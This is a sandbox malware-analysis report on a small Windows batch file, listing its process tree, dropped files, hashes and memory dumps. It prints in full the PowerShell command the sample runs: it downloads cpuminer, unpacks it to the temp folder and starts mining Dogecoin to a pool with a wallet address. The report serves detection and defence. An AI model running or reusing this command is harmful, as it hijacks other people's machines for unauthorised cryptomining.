b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1799s
max time network
1803s
platform
windows10-2004_x64
resource
win10v2004-20231215-de
resource tags

arch:x64arch:x86image:win10v2004-20231215-delocale:de-deos:windows10-2004-x64systemwindows
submitted
04-02-2024 03:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	3568	powershell.exe
15	3568	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1424	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1424	cpuminer-sse2.exe
1424	cpuminer-sse2.exe
1424	cpuminer-sse2.exe
1424	cpuminer-sse2.exe
1424	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3568	powershell.exe
3568	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3568	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 3568	3512	cmd.exe	85
PID 3512 wrote to memory of 3568	3512	cmd.exe	85
PID 3568 wrote to memory of 2300	3568	powershell.exe	93
PID 3568 wrote to memory of 2300	3568	powershell.exe	93
PID 2300 wrote to memory of 1424	2300	cmd.exe	95
PID 2300 wrote to memory of 1424	2300	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3568
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1424

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvsxbl1c.jpm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
595KB

MD5
cae7f5979a4f6956b81d245964497c60

SHA1
0dc3342ad5764a513fb92c17186bb17830c4255f

SHA256
6ceb019db56caf61cb0ff202e7ff5995d4d5f97a977d2eb33e5314c2035b3f0f

SHA512
b1d244515dd540149d302e272de74ad959378fb2e6f96053433cd48e4e3b5a261d9b9def8579fc411b5ecb30d95b7bde8821779c3c17236dfc81041bf9d36dd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
523KB

MD5
02085c4f4a7cd4adc6e0fb0e063e3282

SHA1
86e0454211d96552df31fa1e6c6a8ffaeed61a34

SHA256
33bf89928002dcae0895679b2bee37f229a3252fd9795a0ebacdacccffaa4188

SHA512
32b98a7842d4d410fecf62a3b85ffac148a6e761ed6a45d0f795e4f6db8c11b3cbbcfb65b15c4c1ee877a46a47f7d1de023d56f07b28511a241860971c7346ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
419KB

MD5
6ba54357d83a694d41d47c01914a50a9

SHA1
6d18ea99962badc5b7cf349511b39687ca06dceb

SHA256
c22bc2005124159143893b6bdd3c847a9c8eb90cbb68864516ad6357576008c4

SHA512
e28dcd6d2831b9ffc697139733f70629826733d5ceb7da3017811cc62f1e48bde2d9935bc41a6aa0477602eba65636ee63bcbeea901d36a9d1cfc2ee585f5141

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
634KB

MD5
dddf8ceb3b9f0babe58e57639ba65000

SHA1
0b4b2d1d7cb1e77d628cd70568105d47c63345af

SHA256
2fcd4ce0a901c07a3a67c4cc0dffdb18cb9987817a4425e3db157719e9388b18

SHA512
688bd856bf73e2d01de26d9c62ad3121abfe9e2bdcbb75d7c9a4d8213c12354fcffd8b9be2986de4e69afa4e26a331786d707bf7889e86237f420fd21ac2799e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
238KB

MD5
99b4adcd7babab4d002c541dab1a71e2

SHA1
286dcecaf2aace63cce3ed52759f1cbae8b34b7b

SHA256
2bc554ca415f9c5d5833a898ad2d43a94a20f0dd40bc7d72725b5278ea73118b

SHA512
c8605b3ba8ccc0f2d7a802d05584331ecb7bb923a5ca5aa55409da0a0394eb2e75feb5b2e15f31e3065bbad468ba0b92eb00b2af658237807790e0b834d0894a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
474KB

MD5
917bde77a4bd0fa8747c954c2ae56254

SHA1
fa5caca3f1f2cd9c3207fed48c80136bb73b0c3a

SHA256
c0871b325382d86703020e5dbd48a6f531db4daa1c37b7ade125eebea1553bcb

SHA512
b3b3098a3a1a9025df2e41546e70d73abb34dfbbf8bca544b7ded382ddf6276875ac5b48a41b0583349cc3a51152d7070f20b3543c34731cf651b0d2e3174409

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
995KB

MD5
2f891384a7a5b604145adbec1089a118

SHA1
bf8784a72afe5037adc6171acd5fb85cd0a525b6

SHA256
9893484bf4f61a582e23eaa461fb53d4b80ed7b364e73c0634271c24fc8b0f39

SHA512
b9167271c09b7355370aa5a1d4ef8eb4b53db24ef94d26b70bb9ec722268796b212228aa7cdc187479740b268621a717c567669cf2ed0284d62d57ec21677a55

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
454KB

MD5
744b8765d3129ff84e7d5e6c77fd0942

SHA1
0080c709ff202d26dc1d005ea879f13216e1458f

SHA256
edb0bda164c2d4c7ae512f47cdd6aa0ac370478d9c75aa729b3bd1b6af8ecb5d

SHA512
f121d47f16cd4a51a630f3613203d3ae0df84ca6eb595e00d0019ab9a3ada994fa22a09cf36846f133fedcc3094bdb1ebbc6f53f93adb95960550f6902c1c34b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
143KB

MD5
ef368255d0014366b5e1c4ede7b73aa5

SHA1
0432c95715ceb305033d3cb3cc6ef39948ecb8c9

SHA256
279c29c98cb72111e96e7537f61ce3f851b78b7740b9cadee037b3c25f2a48ff

SHA512
c1f5cdd6025339fbc79ddda2e9d2e9595d647af8cb9101a13782da5e42dc3341b16014e8e2352c3adb4d67b6e5c526cbfeaaa7898253255578642376c0178e63

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
139KB

MD5
93f96489a139b4000c9287f0956de724

SHA1
732f84e00bf6e75486d08456167a47f4d9cfe050

SHA256
27ef3797b6abb32b105a2f127cfa2c627a90627c10b23979f1368580d75d5b8c

SHA512
2c45ba598c69c134e07f0ac96275a27f43b310d14bb0b5454aa7a29e698c934613f7dfb88c2d34883837220a5eae3babce33a8fa2c9009ca9ad12e5bf71d0586

Download Submit
memory/1424-78-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/1424-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-129-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-119-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-114-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-109-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1424-75-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1424-76-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1424-77-0x000000006AA10000-0x000000006AAA8000-memory.dmp

Filesize
608KB

Download
memory/1424-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3568-15-0x00000247FDA20000-0x00000247FDB24000-memory.dmp

Filesize
1.0MB

Download
memory/3568-16-0x00000247FD760000-0x00000247FD776000-memory.dmp

Filesize
88KB

Download
memory/3568-11-0x00007FFFF4620000-0x00007FFFF50E1000-memory.dmp

Filesize
10.8MB

Download
memory/3568-0-0x00000247FD780000-0x00000247FD806000-memory.dmp

Filesize
536KB

Download
memory/3568-13-0x00000247FD550000-0x00000247FD560000-memory.dmp

Filesize
64KB

Download
memory/3568-14-0x00000247FCF90000-0x00000247FCFA0000-memory.dmp

Filesize
64KB

Download
memory/3568-10-0x00000247FD6F0000-0x00000247FD712000-memory.dmp

Filesize
136KB

Download
memory/3568-22-0x00000247FD950000-0x00000247FD962000-memory.dmp

Filesize
72KB

Download
memory/3568-12-0x00000247FCF90000-0x00000247FCFA0000-memory.dmp

Filesize
64KB

Download
memory/3568-17-0x00007FFFF4620000-0x00007FFFF50E1000-memory.dmp

Filesize
10.8MB

Download
memory/3568-18-0x00000247FCF90000-0x00000247FCFA0000-memory.dmp

Filesize
64KB

Download
memory/3568-19-0x00000247FCF90000-0x00000247FCFA0000-memory.dmp

Filesize
64KB

Download
memory/3568-21-0x00000247FCF90000-0x00000247FCFA0000-memory.dmp

Filesize
64KB

Download
memory/3568-61-0x00007FFFF4620000-0x00007FFFF50E1000-memory.dmp

Filesize
10.8MB

Download
memory/3568-23-0x00000247FD750000-0x00000247FD75A000-memory.dmp

Filesize
40KB

Download